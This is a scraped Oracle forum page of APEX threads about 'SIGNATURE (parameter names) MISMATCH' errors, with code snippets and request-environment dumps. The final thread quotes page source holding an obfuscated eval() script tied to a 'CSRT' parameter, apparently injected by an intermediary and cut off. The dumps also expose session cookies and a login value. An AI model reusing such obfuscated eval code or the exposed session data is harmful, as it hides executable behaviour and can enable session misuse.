Wwv_flow.accept: SIGNATURE (parameter names) MISMATCH in Internet Explorer

Hi,
I have an multiple files upload applet embedded in my ApEx page.
+if (_ie == true) {+
document.writeln('<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" WIDTH="250" HEIGHT="250" NAME="fileupload" codebase="http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1,4,0,0">');
+}+
+else {+
document.writeln('<APPLET CODE="jfileupload.upload.client.MApplet.class" JAVA_CODEBASE="./" ARCHIVE="/lib/jfileupload.jar,/lib/httpimpl.jar,/lib/chttpclient.jar,/lib/clogging.jar" WIDTH="250" HEIGHT="250" NAME="fileupload">');
+}+
+// BEGIN: Update parameters below for INTERNET EXPLORER, FIREFOX, SAFARI, OPERA, MOZILLA, NETSCAPE 6+ support.+
document.writeln('<PARAM NAME=CODE VALUE="jfileupload.upload.client.MApplet.class">');
document.writeln('<PARAM NAME=CODEBASE VALUE="./">');
document.writeln('<PARAM NAME=ARCHIVE VALUE="lib/jfileupload.jar,lib/httpimpl.jar,lib/chttpclient.jar,lib/clogging.jar">');
document.writeln('<PARAM NAME=NAME VALUE="fileupload">');
document.writeln('<PARAM NAME="type" VALUE="application/x-java-applet;version=1.4">');
document.writeln('<PARAM NAME="scriptable" VALUE="true">');
document.writeln('<PARAM NAME="url" VALUE="http://localhost:8080/upload/process.jsp">');
document.writeln('<PARAM NAME="paramfile" VALUE="uploadfile">');
document.writeln('<PARAM NAME="param1" VALUE="todo">');
document.writeln('<PARAM NAME="value1" VALUE="upload">');
document.writeln('<PARAM NAME="mode" VALUE="http">');
+// END+
+if (_ie == true) {+
document.writeln('</OBJECT>');
+}+
+else {+
document.writeln('</APPLET>');
+}+
and everything works just fine in Firefox. In IE the applet & upload works also just fine, but when pressing any of the buttons / links that do doSubmit(...) I get wwv_flow.accept: SIGNATURE (parameter names) MISMATCH. Checked the logs
wwv_flow.accept: SIGNATURE (parameter names) MISMATCH
VARIABLES IN FORM NOT IN PROCEDURE: FILEUPLOAD
NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
DAD name: apex
PROCEDURE  : wwv_flow.accept
URL        : http://localhost:7777/pls/apex/wwv_flow.accept
PARAMETERS :
+===========+
P_FLOW_ID:
+300+
P_FLOW_STEP_ID:
+406+
P_INSTANCE:
+640383331330048+
P_PAGE_SUBMISSION_ID:
+1665117950048907+
P_REQUEST:
UPDATE
+...+
P_T19:
+20+
P_ARG_VALUES:
+4A2329731083629E48F9E21DBF30E047+
FILEUPLOAD:
+jfileupload.upload.client.MApplet[panel1,0,0,400x250,layout=java.awt.BorderLayout,rootPane=javax.swing.JRootPane[,0,0,400x250,layout=javax.swing.JRootPane$RootLayout,alignmentX=0.0,alignmentY=0.0,border=,flags=16777673,maximumSize=,minimumSize=,preferredSize=],rootPaneCheckingEnabled=true]+
P_MD5_CHECKSUM:
ENVIRONMENT:
+============+
PLSQL_GATEWAY=WebDb
GATEWAY_IVERSION=3
SERVER_SOFTWARE=Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
GATEWAY_INTERFACE=CGI/1.1
SERVER_PORT=7777
SERVER_NAME=localhost
REQUEST_METHOD=POST
QUERY_STRING=
PATH_INFO=/wwv_flow.accept
SCRIPT_NAME=/pls/apex
REMOTE_HOST=
REMOTE_ADDR=10.10.1.27
SERVER_PROTOCOL=HTTP/1.1
REQUEST_PROTOCOL=HTTP
REMOTE_USER=APEX_PUBLIC_USER
ORACLE_SSO_USER=
OSSO_IDLE_TIMEOUT_EXCEEDED=
OSSO_USER_GUID=
HTTP_CONTENT_LENGTH=18694
HTTP_CONTENT_TYPE=multipart/form-data; boundary=---------------------------7d91d73a3d06d6
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; .NET CLR 3.0.30729)
HTTP_HOST=localhost:7777
HTTP_ACCEPT=image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xamlxml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*+
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT_LANGUAGE=en-US,nl-BE;q=0.7,fr-BE;q=0.3
HTTP_ACCEPT_CHARSET=
HTTP_IF_MODIFIED_SINCE=
HTTP_REFERER=http://localhost/pls/apex/f?p=300:406:640383331330048::NO:406:P406_SALE_ID:41
HTTP_SOAPACTION=
HTTP_ORACLE_ECID=1257265252:77.73.101.136:8384:8244:2,0
HTTP_ORACLE_CACHE_VERSION=
HTTP_AUTHORIZATION=
WEB_AUTHENT_PREFIX=
DAD_NAME=apex
DOC_ACCESS_PATH=docs
DOCUMENT_TABLE=wwv_flow_file_objects$
PATH_ALIAS=
REQUEST_CHARSET=WE8MSWIN1252
REQUEST_IANA_CHARSET=WINDOWS-1252
SCRIPT_PREFIX=/pls
+...+
and looks like IE submits also the fileupload OBJECT object :(. Anyone hit this issue before? Any idea's how can I make IE ignore / not submit that object?
Thanks in advance,
Florin

Florin:
Is the 'NAME' attribute required for the APPLET ? If not, just remove it or specify 'f01' (assuming you don't have any other apex_item generated items in the page) instead.
Varad

Similar Messages

  • Wwv_flow.accept: SIGNATURE (parameter names) MISMATCH

    Hi folks,
    I'm getting an below error when submitting page:
    wwv_flow.accept: SIGNATURE (parameter names) MISMATCH
    VARIABLES IN FORM NOT IN PROCEDURE: P3_TEXAREA_TOM_REM
    NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
      DAD name: he
      PROCEDURE  : wwv_flow.accept
      URL        : http://url/pls/he/wwv_flow.accept
      PARAMETERS :
      ===========My page is only a test page, where I have only 1 item defined with below settings:
    ITEM TYPE: TEXTAREA called "P3_TEXAREA_TOM"
    In "Post Element Text" I've entered:
    <div>
    <input readonly type="text" name="P3_TEXAREA_TOM_REM" size="3" maxlength="3" value="100"> characters left
    <br>
    </div>Above was entered as a placer for counting available characters.
    If above "Post Element Text" is cleared, page submits sucessfully.
    Any idea how to fix it?
    Thanks,
    Tomas

    Hi Jari,
    I have an additional task, where I'm trying to implement character count for this test text field, as standard one, seems to be not working properly, when you use a "return" character (as the carrige returns should be counted as 2) which later causes:
    ORA-12899: value too large for column "QTEST"."TEST"."TEXTVAR100" (actual: 118, maximum: 100)while my textarea is restricted to 100 character only!
    Here is my settings:
    1 page item:
    Name: P3_TEXAREA_TOM,
    Type: TEXTAREA
    Maximum Width: 100
    HTML Form Element Attributes: onKeyDown="textCounter('P3_TEXAREA_TOM','P3_TEXAREA_TOM_REM',100)" onKeyUp="textCounter('P3_TEXAREA_TOM','P3_TEXAREA_TOM_REM',100)" onBlur="trim_field('P3_TEXAREA_TOM',100)" Post Element Text:
    <div>
    <input disabled type="text" name="P3_TEXAREA_TOM_REM" size="3" maxlength="4" value="100"> characters left
    <br>
    </div>Other properties for item are default.
    Page header javascript:
    <script type="text/javascript">
    function trim(str, chars) {
         return ltrim(rtrim(str, chars), chars);
    function ltrim(str, chars) {
         chars = chars || "\\s";
         return str.replace(new RegExp("^[" + chars + "]+", "g"), "");
    function rtrim(str, chars) {
         chars = chars || "\\s";
         return str.replace(new RegExp("[" + chars + "]+$", "g"), "");
    function trim_field(field_name, maxlimit) {
         <!-- alert(document.getElementById(field_name).value.length); -->
       document.getElementById(field_name).value = trim(document.getElementById(field_name).value);
         <!-- alert(document.getElementById(field_name).value.length); -->
       if (document.getElementById(field_name).value.length > maxlimit)
         document.getElementById(field_name).value = document.getElementById(field_name).value.substring(0, maxlimit);
         <!-- alert(document.getElementById(field_name).value.length); -->
    function textCounter(field_name, cntfield_name, maxlimit) {
      l_field = document.getElementById(field_name);
      l_cntfield = document.getElementById(cntfield_name);
      if (l_field.value.length > maxlimit)
         // if too long...trim it!
         // first try to trim it
         l_field.value = trim(l_field.value);
         if (l_field.value.length > maxlimit)
            l_field.value = l_field.value.substring(0, maxlimit);
            alert('Maximum characters reached!');
         else
            l_cntfield.value = maxlimit - l_field.value.length;
         <!-- alert(l_field.value.length); -->
      // otherwise, update 'characters left' counter
      else
         l_cntfield.value = maxlimit - l_field.value.length;
    </script>On page is also 1 submit button which inserts record into below table:
    In database I have 1 test table:
    create table test
    ( text        clob,
      textvar100  varchar2(100)
    );Page Insert process (once SUBMIT button is pressed):
    insert into test
    ( text,
      textvar100
    values
    ( :P3_TEXAREA_TOM,
      :P3_TEXAREA_TOM
    );If you enter string with length <= 100 characters then all works fine, except when you use few carriage returns.
    Any idea how to fix this dodgy issue?
    Thanks,
    Tomas

  • HTTP-404 \nwwv_flow.accept: SIGNATURE (parameter names) MISMATCH\nVARIABLES

    Hello Experts,
    Im getting following error on my Apex Application :-
    [Mon Jan 17 12:23:56 2011] [error] [client 148.197.8.17] [ecid: 85107896978,1] mod_plsql: /pls/jdbtest/wwv_flow.accept HTTP-404 \nwwv_flow.accept: SIGNATURE (parameter names) MISMATCH\nVARIABLES IN FORM NOT IN PROCEDURE: CHECKBOX\nNON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM: \n
    I've got a form which a has a select list, depending on the select list, Check boxes are displayed on the form
    I've got the following code in "HTML Form Element Attributes" for the Select list Item :-
    onchange="setCheckbox(this, 'P3_CHECKBOX_ITEM');"
    And I've got the following AJEX to create the Checkboxes :-
    function setCheckbox(pThis, pItem){
    var l_code = '';
    var l_code1 = '';
    // Get checkbox name
    rName = $x(pItem).firstChild.name;
    alert(rName);
    // Fire AJAX
    var get = new htmldb_Get(null,html_GetElement('pFlowId').value,'APPLICATION_PROCESS=CHECKBOX_LIST',0);
    get.add('F109_SELECTLIST_ITEM_1',pThis.value);
    gReturn = get.get('XML');
    if (gReturn)
    var values = gReturn.getElementsByTagName('value');
    var messages = gReturn.getElementsByTagName('message');
    // Build the checkbox
    for (i=0; i<values.length; i++) {
    var rValue = values.firstChild.nodeValue;
    var rMessage = messages[i].firstChild.nodeValue;
    if (rValue != 1) {
    // l_code+='<DIV ID="P3_CHECKBOX_ITEM">Roles</DIV>';
    //alert(rName);
    l_code+='<input id='+pItem+' type=checkbox value='+rValue+' name="checkbox">';
    l_code+='<label for='+pItem+'_'+i+'>'+rMessage+'</label>
    if (l_code=='')
    l_code1 += '<DIV ID="P3_CHECKBOX_ITEM"></DIV>';
    else
    l_code1 = '<br><DIV ID="P3_CHECKBOX_ITEM">Roles</DIV>'+l_code+'</br>';
    $x(pItem).innerHTML = l_code1;
    Everything works as it should I don't tick any of the check box, but as soon as I tick the check boxes I get the above mentioned Error.
    Can anyone please help?
    Thanks

    You are trying to create a checkbox on the fly and submit it with the page.
    But then APEX checks all the submitted items, detects your checkbox and doesn't know where to put it. So it raises an exception.
    You should disable your checkbox before submit, then it won't get sent back to the server. You also could remove the "name" attribute of your checkbox, APEX will ignore it then. Whatever suits your needs best.
    brgds,
    Peter
    Blog: http://www.oracle-and-apex.com
    ApexLib: http://apexlib.oracleapex.info
    BuilderPlugin: http://builderplugin.oracleapex.info
    Work: http://www.click-click.at

  • HTTP-404 SIGNATURE (parameter names) MISMATCH

    Hello,
    When trying to upload files in APEX Application, I get "HTTP 404 Not Found". In the Apache error log file I find the following:
    mod_plsql: /dmgrdev/f HTTP-404 \nf: SIGNATURE (parameter names) MISMATCH\nVARIABLES IN FORM NOT IN PROCEDURE: P\nNON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM: \n
    mod_plsql: /dmgrdev/wwv_flow.accept HTTP-404 ORA-00942: table or view does not exist\n
    I've tried editing DADs file but this has not seemed to help. Is there something I'm missing? Please help.
    Thanks in advance,
    Jayna

    It turns out that this was occuring due to missing rights. If you're not setting PlsqlDatabaseUsername in dads.conf file, then you have to grant necessary rights used by APEX_PUBLIC_USER or HTMLDB_PUBLIC_USER.
    Thanks
    Jayna

  • Batch_insert: SIGNATURE (parameter names) MISMATCH,

    hai.....
    I have written a procedure for enter the input data... that's works well..
    in that procedure i am haveing 9 input parameters.....
    the second procedure is for inserting the parameter which i entered....
    i entered thedata and i try to click
    submit button it gives the error...
    batch_insert: SIGNATURE (parameter names) MISMATCH
    VARIABLES IN FORM NOT IN PROCEDURE: B_TYPE,B_ID,START_DATE,DUR,T_ID,M_ID,E_ID,P_ID,L_ID
    NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
    DAD name: atc
    PROCEDURE : batch_insert
    URL : http://suntechchn:7777/pls/atc/batch_insert
    PARAMETERS :
    ============
    B_TYPE:
    PSC
    B_ID:
    EO999/00-01
    START_DATE:
    21-aug-01
    DUR:
    5
    T_ID:
    DBA TRACK
    M_ID:
    O8IDBA
    E_ID:
    AJAY
    P_ID:
    ORACLE
    L_ID:
    BANGALORE
    kindly help me...
    thanks in advance
    null

    I also get this same error. I only get this error when using content areas. Any help would be appreciated.

  • SIGNATURE (parameter names) MISMATCH

    I wrote the procedure to pass a parameter to another procedure  p_sel_crse_search
    PROCEDURE p_enter_term
    IS
    BEGIN
      ---- HTP.p ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">');
       HTP.p (
          '<FORM ACTION="/test/bzskfcls.p_sel_crse_search" METHOD="POST" onSubmit="return checkSubmit()">');
       HTP.p (
          '<INPUT TYPE="hidden" NAME="p_sel_crse_search" VALUE="p_sel_crse_search">');
       HTP.p (
          '<TABLE  class="dataentrytable" summary="This layout table is used for term selection."width="50%"><CAPTION class="captiontext">Search by Term: </CAPTION>');
       HTP.p ('<TR>');
       HTP.p (
          '<TD class="dedefault"><LABEL for=term_input_id><SPAN class="fieldlabeltextinvisible">Term</SPAN></LABEL>');
       HTP.p ('<SELECT NAME="p_term" SIZE="1"  ID="term_input_id">');
       HTP.p ('<OPTION VALUE="">None');
       HTP.p ('<OPTION VALUE="201410">Fall 2013');
       HTP.p ('<OPTION VALUE="201320">Spring 2013');
       HTP.p ('</SELECT>');
       HTP.p ('</TD>');
       HTP.p ('</TR>');
       HTP.p ('</TABLE>');
       HTP.p ('<BR>');
       HTP.p ('<BR>');
       HTP.p ('<INPUT TYPE="submit" VALUE="Submit">');
       HTP.p ('<INPUT TYPE="reset" VALUE="Reset">');
       HTP.p ('</FORM>');
    END;
    PROCEDURE p_sel_crse_search(p_term IN stvterm.stvterm_code%type)
       IS
          term_arr   OWA_UTIL.ident_arr;
       BEGIN
         htp.p('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">');
           ---term_arr (1) := 201320;
            term_arr (1) := p_term;
          -- OBS term_arr(1) := '201320';
          P_CrseSearch_Advanced(term_in => term_arr);
          --P_CrseSearch (term_in => term_arr);
       END p_sel_crse_search;
    I am getting the following error
    Failed to parse target procedure
    bzskfcls.p_sel_crse_search: SIGNATURE (parameter names) MISMATCH
    VARIABLES IN FORM NOT IN PROCEDURE: P_SEL_CRSE_SEARCH
    NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
      DAD name: test
      PROCEDURE  : bzskfcls.p_sel_crse_search
      URL        : http://dev-ssb-vip.bowdoin.edu:80/test/bzskfcls.p_sel_crse_search
      PARAMETERS :
      ===========
      P_SEL_CRSE_SEARCH:
       p_sel_crse_search
      P_TERM:
       201320
      ENVIRONMENT:
      ============
        PLSQL_GATEWAY=WebDb
        GATEWAY_IVERSION=2
        SERVER_SOFTWARE=Oracle-Application-Server-11g
        GATEWAY_INTERFACE=CGI/1.1
        SERVER_PORT=80
        SERVER_NAME=dev-ssb-vip.bowdoin.edu
        REQUEST_METHOD=POST
        QUERY_STRING=
        PATH_INFO=/bzskfcls.p_sel_crse_search
        SCRIPT_NAME=/test
        REMOTE_HOST=
        REMOTE_ADDR=139.140.238.250
        SERVER_PROTOCOL=HTTP/1.1
        REQUEST_PROTOCOL=HTTP
        REMOTE_USER=www2_user
        ORACLE_SSO_USER=
        OSSO_IDLE_TIMEOUT_EXCEEDED=
        OSSO_USER_GUID=
        HTTP_CONTENT_LENGTH=49
        HTTP_CONTENT_TYPE=application/x-www-form-urlencoded
        HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)
        HTTP_HOST=dev-ssb-vip-test.bowdoin.edu
        HTTP_ACCEPT=application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
        HTTP_ACCEPT_ENCODING=gzip, deflate
        HTTP_ACCEPT_LANGUAGE=en-US
        HTTP_ACCEPT_CHARSET=
        HTTP_COOKIE=SESSID=MEJIRE44MTgyMDQy; __utma=253559834.1105023054.1363618289.1370889203.1370894368.70; __utmz=253559834.1370894368.70.30.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bopwdoin%20college; IDMSESSID=6FCCE37AD1073BAE58A72D6471FB4ABE; sghe_magellan_username=Mzg1NzQ=; sghe_magellan_locale=en_US
        HTTP_IF_MODIFIED_SINCE=
        HTTP_REFERER=https://dev-ssb-vip-test.bowdoin.edu/test/bzskfcls.p_enter_term
        HTTP_SOAPACTION=
        HTTP_ORACLE_ECID=
        HTTP_ORACLE_CACHE_VERSION=
        HTTP_AUTHORIZATION=
        WEB_AUTHENT_PREFIX=
        DAD_NAME=test
        DOC_ACCESS_PATH=docs
        DOCUMENT_TABLE=wpg_document
        PATH_ALIAS=
        REQUEST_CHARSET=AL32UTF8
        REQUEST_IANA_CHARSET=UTF-8
        SCRIPT_PREFIX=
        HTTP_IF_MATCH=
        HTTP_CACHE_CONTROL=
        SOAP_BODY=
        HTTP_X_ORACLE_DEVICE_CLASS=
        HTTP_X_ORACLE_DEVICE_ORIENTATION=
        HTTP_X_ORACLE_DEVICE_MAXDOCSIZE=
        HTTP_X_ORACLE_DEVICE=
        HTTP_X_ORACLE_ORIG_ACCEPT=
        HTTP_X_ORACLE_ORIG_USER_AGENT=
        HTTP_X_ORACLE_USER_LOCALE=
        HTTP_X_ORACLE_USER_NAME=
        HTTP_X_ORACLE_USER_DISPLAYNAME=
        HTTP_X_ORACLE_USER_USERKIND=
        HTTP_X_ORACLE_USER_AUTHKIND=
        HTTP_X_ORACLE_USER_DEVICEID=
        HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE1=
        HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE2=
        HTTP_X_ORACLE_USER_LOCATION_ADDRESSLASTLINE=
        HTTP_X_ORACLE_USER_LOCATION_BLOCK=
        HTTP_X_ORACLE_USER_LOCATION_CITY=
        HTTP_X_ORACLE_USER_LOCATION_COMPANYNAME=
        HTTP_X_ORACLE_USER_LOCATION_COUNTY=
        HTTP_X_ORACLE_USER_LOCATION_STATE=
        HTTP_X_ORACLE_USER_LOCATION_POSTALCODE=
        HTTP_X_ORACLE_USER_LOCATION_POSTALCODEEXT=
        HTTP_X_ORACLE_USER_LOCATION_COUNTRY=
        HTTP_X_ORACLE_USER_LOCATION_TYPE=
        HTTP_X_ORACLE_USER_LOCATION_X=
        HTTP_X_ORACLE_USER_LOCATION_Y=
        HTTP_X_ORACLE_SERVICE_HOME_URL=
        HTTP_X_ORACLE_SERVICE_PARENT_URL=
        HTTP_X_ORACLE_HOME_URL=
        HTTP_X_ORACLE_MODULE_CALLBACK_URL=
        HTTP_X_ORACLE_MODULE_CALLBACK_LABEL=
        HTTP_X_ORACLE_CACHE_USER=
        HTTP_X_ORACLE_CACHE_SUBID=
        HTTP_X_ORACLE_CACHE_AUTH=
        HTTP_X_ORACLE_CACHE_DEVICE=
        HTTP_X_ORACLE_CACHE_LANG=
        HTTP_X_ORACLE_CACHE_ENCRYPT=
        HTTP_X_ORACLE_ASSERT_USER=

    Check if the stvterm.stvterm_code%type is of type varchar2 or number? The parameter p_term value is 201320 which might be coming as varchar2 while the svtterm_code might be a number or vice versa and hence causing the mismatch.
    Rgds
    San

  • Requested URL /pls/apex/wwv_flow.accept was not found on this server

    Hi there
    Since yesterday we have had troubles with apex production our environment is Apex 4.1, Oracle 11gR2 over windows server 2008, please help me to solve this issue,
    it happend in the login page and when submit the authentication
    we don have any procedure or form named CSRT (sincerly i don't know what is it)
    Sat, 02 Jun 2012 00:46:58 GMT
    wwv_flow.accept: SIGNATURE (parameter names) MISMATCH
    VARIABLES IN FORM NOT IN PROCEDURE: CSRT
    NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
    DAD name: apex
    PROCEDURE : wwv_flow.accept
    URL : http://<servername>/pls/apex/wwv_flow.accept
    PARAMETERS :
    ===========
    P_FLOW_ID:
    10000
    P_FLOW_STEP_ID:
    101
    P_INSTANCE:
    1188591586206701
    P_PAGE_SUBMISSION_ID:
    1718810680562501
    P_REQUEST:
    P101_PASSWORD
    CSRT:
    4970566970745194725
    P_ARG_NAMES:
    3865609856762007
    3865732602762007
    P_T01:
    administrator
    P_T02:
    passsss
    P_MD5_CHECKSUM:
    P_PAGE_CHECKSUM:
    A98EB992B8BC89BE54BB1A8BAC4F05FF
    ENVIRONMENT:
    ============
    PLSQL_GATEWAY=WebDb
    GATEWAY_IVERSION=3
    SERVER_SOFTWARE=Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
    GATEWAY_INTERFACE=CGI/1.1
    SERVER_PORT=80
    SERVER_NAME=servername
    REQUEST_METHOD=POST
    QUERY_STRING=
    PATH_INFO=/wwv_flow.accept
    SCRIPT_NAME=/pls/apex
    REMOTE_HOST=
    REMOTE_ADDR=148.204.103.109
    SERVER_PROTOCOL=HTTP/1.1
    REQUEST_PROTOCOL=HTTP
    REMOTE_USER=APEX_PUBLIC_USER
    ORACLE_SSO_USER=
    OSSO_IDLE_TIMEOUT_EXCEEDED=
    OSSO_USER_GUID=
    HTTP_CONTENT_LENGTH=312
    HTTP_CONTENT_TYPE=application/x-www-form-urlencoded
    HTTP_USER_AGENT=Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    HTTP_HOST=www.ebecas.ipn.mx
    HTTP_ACCEPT=text/html, application/xhtml+xml, */*
    HTTP_ACCEPT_ENCODING=
    HTTP_ACCEPT_LANGUAGE=es-MX
    HTTP_ACCEPT_CHARSET=
    HTTP_COOKIE=WWV_CUSTOM-F_1280503233500189_10000=3CAE234CC12CBF34CAC4A802F7E56419; WWV_CUSTOM-F_3230615565651498_2000=85A8907E234374F9065F2AD170F7B446; PUBLIC_WWV_CUSTOM-F_3230615565651498_2000=2708019786394201; WWV_CUSTOM-F_3230615565651498_2400=038325581CE3C913839B01B86444E24E; PUBLIC_WWV_CUSTOM-F_3230615565651498_2400=609137910649001; WWV_CUSTOM-F_3230615565651498_308=0437267FCCB0A166B36DCF5BA56261EB; PUBLIC_WWV_CUSTOM-F_3230615565651498_308=30428853764001; WWV_CUSTOM-F_1280503233500189_777=5B01254A5CD4D740F4758DC9EC163928; PUBLIC_WWV_CUSTOM-F_1280503233500189_777=689694810635801; PUBLIC_WWV_CUSTOM-F_1280503233500189_10000=1649958529159401; WWV_CUSTOM-F_1280503233500189_100=5932332699F7E216AE8D86FD62D69B5A; ORA_WWV_USER_63131075338127=AB757F79A601B064B269432C60D984AC; TS5d40a3=ccd424a738458568ec242aa1123ddd1e596ad0e9e522c57a4fc7aaf6; ORA_WWV_USER_71418318778246=0A42816D6E86C44D1731B394A8802013; __utmc=8977645; TS5af0a4=8ea79f2c523309c506a0a48047fd743f596ad0e9e522c57a4fc962d0; TS5af0a4_28=2a1d0a2d897dca30ab56d0cb72789138596ad0e9e522c57a0000000000000000004fc7c5b78414789acdf34f97; TS5af0a4_77=8572_0e073dd415ef2d41_rsb_0_rs_http%3A%2F%2Fwww.ebecas.ipn.mx%2Fportal%2Ff%3Fp%3D10000%3ABIENVENIDO_rs_1
    HTTP_IF_MODIFIED_SINCE=
    HTTP_REFERER=http://<servername>/pls/apex/f?p=10000:101:1188591586206701
    HTTP_SOAPACTION=
    HTTP_ORACLE_ECID=6305641793926,1
    HTTP_ORACLE_CACHE_VERSION=10.1.2
    HTTP_AUTHORIZATION=
    WEB_AUTHENT_PREFIX=
    DAD_NAME=apex
    DOC_ACCESS_PATH=docs
    DOCUMENT_TABLE=wwv_flow_file_objects$
    PATH_ALIAS=
    REQUEST_CHARSET=AL32UTF8
    REQUEST_IANA_CHARSET=UTF-8
    SCRIPT_PREFIX=/pls
    HTTP_IF_MATCH=
    HTTP_CACHE_CONTROL=
    SOAP_BODY=
    HTTP_X_ORACLE_DEVICE_CLASS=
    HTTP_X_ORACLE_DEVICE_ORIENTATION=
    HTTP_X_ORACLE_DEVICE_MAXDOCSIZE=
    HTTP_X_ORACLE_DEVICE=
    HTTP_X_ORACLE_ORIG_ACCEPT=
    HTTP_X_ORACLE_ORIG_USER_AGENT=
    HTTP_X_ORACLE_USER_LOCALE=
    HTTP_X_ORACLE_USER_NAME=
    HTTP_X_ORACLE_USER_DISPLAYNAME=
    HTTP_X_ORACLE_USER_USERKIND=
    HTTP_X_ORACLE_USER_AUTHKIND=
    HTTP_X_ORACLE_USER_DEVICEID=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE1=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE2=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLASTLINE=
    HTTP_X_ORACLE_USER_LOCATION_BLOCK=
    HTTP_X_ORACLE_USER_LOCATION_CITY=
    HTTP_X_ORACLE_USER_LOCATION_COMPANYNAME=
    HTTP_X_ORACLE_USER_LOCATION_COUNTY=
    HTTP_X_ORACLE_USER_LOCATION_STATE=
    HTTP_X_ORACLE_USER_LOCATION_POSTALCODE=
    HTTP_X_ORACLE_USER_LOCATION_POSTALCODEEXT=
    HTTP_X_ORACLE_USER_LOCATION_COUNTRY=
    HTTP_X_ORACLE_USER_LOCATION_TYPE=
    HTTP_X_ORACLE_USER_LOCATION_X=
    HTTP_X_ORACLE_USER_LOCATION_Y=
    HTTP_X_ORACLE_SERVICE_HOME_URL=
    HTTP_X_ORACLE_SERVICE_PARENT_URL=
    HTTP_X_ORACLE_HOME_URL=
    HTTP_X_ORACLE_MODULE_CALLBACK_URL=
    HTTP_X_ORACLE_MODULE_CALLBACK_LABEL=
    HTTP_X_ORACLE_CACHE_USER=
    HTTP_X_ORACLE_CACHE_SUBID=
    HTTP_X_ORACLE_CACHE_AUTH=
    HTTP_X_ORACLE_CACHE_DEVICE=
    HTTP_X_ORACLE_CACHE_LANG=
    HTTP_X_ORACLE_CACHE_ENCRYPT=
    HTTP_X_ORACLE_ASSERT_USER=

    Tx for help me folks!
    Let me explain
    We have tw domains (a and b) that access to a same database (where the app is)
    i configured the dads.conf to access the database in both domains, from domain a
    i can't acces the app, it send the error before wrote, and from domain b i can access
    without trouble my app, a search the HTML source from my page in both domains and
    notice that in domain a the source is the next (just a bit)
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html lang="es-mx" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head><script language="JavaScript">var pn = "CSRT"; var pv = '3921513832723665401';
    eval(function(a){var b=a.split("");var d=b.length;var c=parseInt(b[0]+b[1],16);var f=String.fromCharCode(c);for(var e=2;e<d;e++){var g=(parseInt(b[e]+b[e+1],16)-c)%256;c=g;f+=String.fromCharCode(g);e++}return f}("288edbe3d1d7ddd8dd968d91908da4f1d7d39283a0a3c7cddfd8a0b1d7d392829fa3dbe3d1d7ddd8dd969495a4f1d7d3928daaa9a7a4cf8e958e5eabe3e1d8924c938e5e5f444ba4e4cf8e909095964f4c8d8f95964f4c4e555e6e7aaa9b97d7d2c9ddc7b58e8d904d5f5f4d8f8d5252a4f1d7d3928ba8aa9b97d7d2c9ddc7b58e4a45454b64a4cf8e938c5e6a5e5aa4e7dbd2c4cdcbd1d7cba3aa9ba1e8d7d5e7e69a939464a8aaaa9ba1e8d7d5e7e69a585c9794a6f3d7d3928aa7aa9b97d7d2c9ddc7b58e4a61614b64a4cf8e92a77a6a5e574c918c5e6a5e5aa4edd7d9e9e7e08e8ce9e6cf8e928b5e6a5e5aa4e8aaaa9ba0d7d5dccdc4c88d578bcf9d4e535b4e444b64a4cf8e959ba1d8c6d3d5cb90578b9b635358667a6a5e5aa4e898685f48489ffae2d1dfd8e0e898685f61619fea9868a2904d5f5f4d8f9fa4cf8e938c5e6a5e5aa4e89868a9dbd2c4cdcbd1d7cbe3fafaefd7d9e9e7e08e8deab8b1d7d39289a6a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7a3dbe3d1d7ddd8dd96969a9895a4f1d7d3928daaa1d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d969764a1d5e19a9ed7d3928ba86d6ba6a7a99b9ad1d3d5dbdca3a6965654a4efe6ebf4f1d7d3928facaac8c6c88b97d7dcd3d7ba9ca19987b1d7d39291ae9f8a95c8c6c88b95ccd9b5b5e8e6dbcbd7e9d98d94985e5b5264a4cf8e99925eabe3e1d8924c97925e5f444ba4e8c8c6c88ba1d8d9b5b5e8e6dbcbd7e9d98d94989d9a64a4cf8e95c8c6c88b97d7dcd3d7ba9ca1996d5eac98a4e8c8c